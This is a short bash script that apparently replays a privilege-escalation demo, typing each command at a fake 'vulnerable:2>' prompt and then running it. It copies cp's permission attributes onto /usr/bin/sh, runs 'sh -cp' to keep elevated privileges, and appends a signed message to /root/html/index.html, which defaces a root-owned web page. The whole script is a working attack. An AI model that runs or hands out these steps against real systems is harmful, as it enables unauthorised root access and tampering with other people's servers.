#!/bin/bash

echo -n "vulnerable:2> "
sleep 1
echo "id" | pv -qL 10 
id
echo -n "vulnerable:2> "
sleep 1
echo "which sh" | pv -qL 10 
which sh
echo -n "vulnerable:2> "
sleep 1
echo "which bash" | pv -qL 10 
which bash
echo -n "vulnerable:2> "
sleep 1
echo "/usr/bin/cp --attributes-only --preserve=all /usr/bin/cp /usr/bin/sh" | pv -qL 10 
/usr/bin/cp --attributes-only --preserve=all /usr/bin/cp /usr/bin/sh
echo -n "vulnerable:2> "
sleep 1
echo "sh -cp 'echo \"Hello again! From: @JR_Knox1977\" >> /root/html/index.html'" | pv -qL 10 
sh -cp 'echo "Hello again! From: @JR_Knox1977" >> /root/html/index.html'
exit
